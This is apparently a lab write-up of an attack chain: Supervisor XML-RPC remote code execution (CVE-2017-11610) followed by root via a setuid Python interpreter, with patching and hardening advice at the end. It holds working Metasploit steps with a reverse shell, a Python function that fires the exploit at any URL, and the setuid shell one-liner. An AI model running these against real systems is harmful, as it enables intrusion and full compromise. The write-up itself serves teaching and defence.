Remote Code Execution – Supervisor Exploit to Root via SUID Python | Super Process

Overview

This lab demonstrates a full attack chain on a Linux target: service enumeration, remote code execution through an exposed management interface, and privilege escalation to root.

The target runs an outdated Supervisor (3.3.2) whose XML-RPC interface is vulnerable to remote code execution (CVE-2017-11610). The interface requires authentication only if a username and password are configured for it; in this lab it accepted calls without credentials. After initial access, privilege escalation is achieved through a misconfigured SUID Python interpreter.


Objective

  • Perform service enumeration
  • Identify and exploit a vulnerable service
  • Gain initial access to the system
  • Escalate privileges to root

Reconnaissance

Nmap Scan

nmap -sV 172.20.8.159

Result:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian
9001/tcp open  http    Medusa httpd 1.12 (Supervisor)

The key finding here is the web service running on port 9001, identified as Supervisor.

Directory Enumeration

gobuster dir -u http://172.20.8.159:9001 -w /usr/share/wordlists/dirb/big.txt

Result:

/images
/stylesheets

No useful attack surface was discovered through directory brute-forcing.


Vulnerability Identification

Accessing the web interface revealed:

Supervisor 3.3.2

This version is vulnerable to:

  • CVE-2017-11610 — XML-RPC Remote Code Execution (affects Supervisor 3.0a1 through 3.3.2; fixed in 3.0.1, 3.1.4, 3.2.4 and 3.3.3)

The bug is in how supervisord dispatches an XML-RPC call: the dotted method name is resolved by walking the attribute chain with getattr, one component at a time, with no limit on depth and no check that the final object is a registered RPC method. A caller can therefore start at the legitimate supervisor namespace and walk down to Python's os module, for example supervisor.supervisord.options.warnings.linecache.os.system, passing a shell command as the single argument. The command runs inside the supervisord process, as whatever user supervisord runs as.
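To make the dispatch bug concrete, here is an added example (not Supervisor's own code, and not part of the original post): a stripped-down model of the pre-3.3.3 resolver that walks every dotted component, beside a 3.3.3-style hardened dispatcher that accepts exactly namespace.method and insists the target is a bound method. The object graph standing in for supervisor.supervisord.options and the intermediate modules is constructed; only the os module at the end of the chain is real, and it is resolved but never called.

```python
"""Model of CVE-2017-11610: unrestricted getattr traversal in an XML-RPC dispatcher.

Added example. The classes below are stand-ins for Supervisor's real object graph
(RootRPCInterface -> supervisor namespace -> supervisord -> options -> ...); the
real os module sits at the end so the traversal result can be checked by identity.
"""
import os
import types


class RPCError(Exception):
    """Stands in for supervisor.xmlrpc.RPCError (UNKNOWN_METHOD, INCORRECT_PARAMETERS)."""


# --- constructed stand-ins for the real supervisor object graph ---------------
class FakeServerOptions:
    # On the Python 2 runtime Supervisor 3.x used, options.warnings was the warnings
    # module and warnings.linecache the linecache module, whose top-level `import os`
    # completed the chain. Namespaces stand in for those two modules here.
    warnings = types.SimpleNamespace(linecache=types.SimpleNamespace(os=os))


class FakeSupervisord:
    options = FakeServerOptions()


class FakeSupervisorNamespace:
    """Stub of the legitimate 'supervisor' RPC namespace."""
    supervisord = FakeSupervisord()

    def getSupervisorVersion(self):
        return "3.3.2"


class RootRPCInterface:
    supervisor = FakeSupervisorNamespace()


ROOT = RootRPCInterface()
PAYLOAD_METHOD = "supervisor.supervisord.options.warnings.linecache.os.system"


# --- vulnerable (pre-3.3.3 style): every dotted component is a getattr ----------
def resolve_vulnerable(root, method):
    """Return whatever object the dotted name reaches; nothing limits the depth."""
    ob = root
    for name in method.split("."):
        if name.startswith("_"):            # the only guard that existed
            raise RPCError("UNKNOWN_METHOD")
        ob = getattr(ob, name, None)
        if ob is None:
            raise RPCError("UNKNOWN_METHOD")
    return ob


def dispatch_vulnerable(root, method, params):
    return resolve_vulnerable(root, method)(*params)


# --- hardened (3.3.3 style): exactly namespace.method, target must be a method ---
def dispatch_hardened(root, method, params):
    parts = method.split(".")
    if len(parts) != 2:                     # no object traversal at all
        raise RPCError("UNKNOWN_METHOD")
    namespace, name = parts
    if name.startswith("_"):
        raise RPCError("UNKNOWN_METHOD")
    iface = getattr(root, namespace, None)
    func = getattr(iface, name, None)
    if not isinstance(func, types.MethodType):   # plain attributes are not RPC methods
        raise RPCError("UNKNOWN_METHOD")
    try:
        return func(*params)
    except TypeError:
        raise RPCError("INCORRECT_PARAMETERS")


def payload_reaches_os_system():
    """True when the vulnerable resolver hands back the real os.system (not invoked)."""
    return resolve_vulnerable(ROOT, PAYLOAD_METHOD) is os.system


def hardened_blocks_payload():
    try:
        dispatch_hardened(ROOT, PAYLOAD_METHOD, ["id"])
    except RPCError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable resolver reaches os.system:", payload_reaches_os_system())
    print("hardened dispatcher blocks payload:   ", hardened_blocks_payload())
    print("legitimate call still served:         ",
          dispatch_hardened(ROOT, "supervisor.getSupervisorVersion", []))
```

The hardened version does not try to blacklist dangerous names; it removes the traversal entirely, which is why the fix also closed any other chain an attacker might have found.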

Exploitation

Search for Exploit

searchsploit supervisor

searchsploit lists the public Exploit-DB entries for this version; Metasploit also ships a module for the same bug:

exploit/linux/http/supervisor_xmlrpc_exec

Metasploit Exploitation

msfconsole
search supervisor
use exploit/linux/http/supervisor_xmlrpc_exec

Set required parameters (RPORT defaults to 9001 and TARGETURI to /RPC2; if the interface is password-protected, supply HttpUsername and HttpPassword as well):

set RHOSTS 172.20.8.159
set LHOST <your_ip>

Check vulnerability:

check

Result:

[+] Vulnerable version found: 3.3.2

Run exploit:

exploit
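The same two steps done by hand, as an added example that is neither the post's nor the Metasploit module's code: the version check against the upstream fix releases, and the CVE-2017-11610 call sent with Python's standard XML-RPC client. The target URL and command are placeholders; the RPC method names are Supervisor's real ones.

```python
"""Manual CVE-2017-11610 check and trigger with xmlrpc.client (added example).

Nothing here is Supervisor's or Metasploit's code. Only build_request() and the
version logic run offline; check() and exploit() need a reachable target.
"""
import re
import xmlrpc.client

# Traversal chain that reaches os.system on Supervisor <= 3.3.2 (Python 2 runtime).
PAYLOAD_METHOD = "supervisor.supervisord.options.warnings.linecache.os.system"

# First release of each 3.x series that carries the fix (upstream July 2017 releases).
FIXED_IN = {(3, 0): (3, 0, 1), (3, 1): (3, 1, 4), (3, 2): (3, 2, 4), (3, 3): (3, 3, 3)}


def parse_version(version):
    """'3.3.2' -> (3, 3, 2); pre-release tags such as '3.0a1' count as x.y.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_vulnerable_version(version):
    """True for 3.0a1 .. 3.3.2 minus the patched point releases; 4.x was never affected."""
    major, minor, patch = parse_version(version)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        return False
    return (major, minor, patch) < fixed


def build_request(command):
    """XML body the target's dispatcher receives; handy for inspection or replay."""
    return xmlrpc.client.dumps((command,), methodname=PAYLOAD_METHOD)


def check(url):
    """Ask the legitimate API for its version and compare with the fixed releases."""
    proxy = xmlrpc.client.ServerProxy(url)
    version = proxy.supervisor.getSupervisorVersion()
    return version, is_vulnerable_version(version)


def exploit(url, command):
    """Run `command` through os.system inside supervisord.

    os.system returns only the exit status, so redirect output to a file or use a
    reverse shell to see results. Credentials, if configured, go in the URL as
    http://user:pass@host:9001/RPC2.
    """
    proxy = xmlrpc.client.ServerProxy(url)
    # A dotted name handed to getattr on the proxy becomes the methodName verbatim.
    return getattr(proxy, PAYLOAD_METHOD)(command)


if __name__ == "__main__":
    target = "http://172.20.8.159:9001/RPC2"   # placeholder from the lab
    print(build_request("id > /tmp/out"))
    # version, vulnerable = check(target)
    # if vulnerable: exploit(target, "id > /tmp/out")
```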

Initial Access

meterpreter > shell
whoami
nobody

We now have a low-privileged shell as nobody. Because the command ran through os.system inside the supervisord process, the shell inherits whatever user supervisord itself runs as on this host.


Privilege Escalation

Check for SUID Binaries

find / -perm -u=s -type f 2>/dev/null

Interesting finding:

/usr/bin/python2.7

Exploiting SUID Python

Using the GTFOBins technique for python. The setuid bit makes the interpreter run with the file owner's UID as its effective UID (confirm with ls -l that the owner is root; a setuid file owned by anyone else only yields that user's privileges), Python does nothing to drop that privilege, and the shell is started with -p so it keeps the effective UID instead of resetting it to the real UID:

python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
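As an added example (not from the original post), the audit a practitioner would run after the find command above: it walks the filesystem the same way, then separates the finding that matters, a root-owned setuid interpreter or other shell-spawning binary, from setuid files that are expected (passwd, sudo) or owned by a non-root user. The name list is an assumption drawn from commonly abused GTFOBins entries rather than an exhaustive list, and the paths and modes in the self-test are constructed.

```python
"""SUID audit that mirrors `find / -perm -u=s -type f` and flags abusable hits (added example)."""
import os
import stat

# Binaries that hand the caller a shell or arbitrary command execution when setuid
# root. Assumption: representative GTFOBins names, extend for your environment.
SHELL_SPAWNING = {
    "python", "perl", "ruby", "node", "php", "lua",
    "bash", "sh", "dash", "zsh", "env", "find", "vim", "vi", "awk", "gawk",
}


def family(name):
    """Strip a trailing version suffix: 'python2.7' -> 'python', 'php7.4' -> 'php'."""
    return name.rstrip("0123456789.")


def classify(path, mode, uid):
    """Classify one directory entry from its st_mode and st_uid.

    Returns:
      'root-setuid-shell'  root-owned setuid binary known to spawn a shell (act on it)
      'root-setuid'        root-owned setuid regular file (review it)
      'setuid-non-root'    setuid bit set but owner is not root (grants that UID only)
      None                 not a setuid regular file
    """
    if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID):
        return None
    if uid != 0:
        return "setuid-non-root"
    base = os.path.basename(path)
    if base in SHELL_SPAWNING or family(base) in SHELL_SPAWNING:
        return "root-setuid-shell"
    return "root-setuid"


def scan(root="/"):
    """Equivalent of `find ROOT -perm -u=s -type f`; lstat so symlinks are not followed."""
    findings = []
    skip = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems, nothing to gain
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            kind = classify(path, st.st_mode, st.st_uid)
            if kind is not None:
                findings.append((path, kind))
    return findings


def gtfobins_python(path):
    """The escalation command used above, parameterised by the interpreter path.

    os.execl keeps the setuid effective UID; `sh -p` keeps it too instead of
    dropping back to the real UID as sh does by default.
    """
    return f"{path} -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"


if __name__ == "__main__":
    for path, kind in scan("/"):
        line = f"{kind:18} {path}"
        if kind == "root-setuid-shell" and family(os.path.basename(path)) == "python":
            line += f"   -> {gtfobins_python(path)}"
        print(line)
```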

Root Access

whoami
root

Privilege escalation successful.


Proof of Exploitation

  • ✅ Initial access obtained via Supervisor RCE
  • ✅ Shell as nobody
  • ✅ Escalation via SUID Python binary
  • ✅ Full root access achieved

Impact

  • Anyone who can reach the XML-RPC interface can execute arbitrary commands as the user supervisord runs as (nobody here)
  • Combined with the setuid interpreter, this leads to full system compromise
  • The misconfigured SUID binary is an escalation path for any local account, independent of the network entry point

Mitigation

  • Upgrade Supervisor to a fixed release: 3.3.3 or later (3.0.1, 3.1.4 and 3.2.4 also carry the fix)
  • Keep the XML-RPC interface off the network: prefer a unix_http_server socket with restrictive chmod/chown, or bind inet_http_server to 127.0.0.1 and set a username and password
  • Remove the setuid bit from interpreters and any other binary that does not need it (chmod u-s), and audit regularly with find / -perm -4000 -type f
  • Run supervisord and the programs it manages with the least privilege they need
  • Monitor exposed management interfaces, and alert on XML-RPC calls whose method names are not in the documented API
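The weak and hardened server settings side by side, as an added example rather than the lab's actual configuration (the write-up does not show it). The section and option names are Supervisor's own; the socket path, user name and password are placeholders, and the two variants are shown as separate files because a single supervisord.conf can hold only one section of each name.

```ini
; --- supervisord.conf (weak, what the lab target looks like) ---------------
; Listens on every interface; no username/password means unauthenticated RPC.
[inet_http_server]
port=*:9001

; --- supervisord.conf (hardened) ------------------------------------------
; Local UNIX socket for supervisorctl, owner-only permissions. Placeholder path.
[unix_http_server]
file=/var/run/supervisor.sock
chmod=0700
chown=root:root

[supervisorctl]
serverurl=unix:///var/run/supervisor.sock

; Only if remote RPC is genuinely needed: loopback only (reach it over SSH or a
; TLS reverse proxy) and credentials required. Placeholder user and password;
; the password may also be given as a SHA-1 hash prefixed with {SHA}.
[inet_http_server]
port=127.0.0.1:9001
username=supervisor_admin
password=change-me-before-deploying
```

Patching removes the traversal bug; the socket and binding changes remove the exposure, so a future bug in the same interface is not reachable from the network either.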

Real-World Insight

Supervisor is commonly used in production environments to manage processes. Its HTTP/XML-RPC interface exists for supervisorctl and the web UI and is only as safe as the bind address and credentials configured for it: exposing it to the network without authentication, or running an unpatched 3.x release, can lead to complete system compromise.

Misconfigured SUID binaries remain one of the most common and overlooked privilege escalation vectors in Linux environments.

This post is licensed under CC BY 4.0 by the author.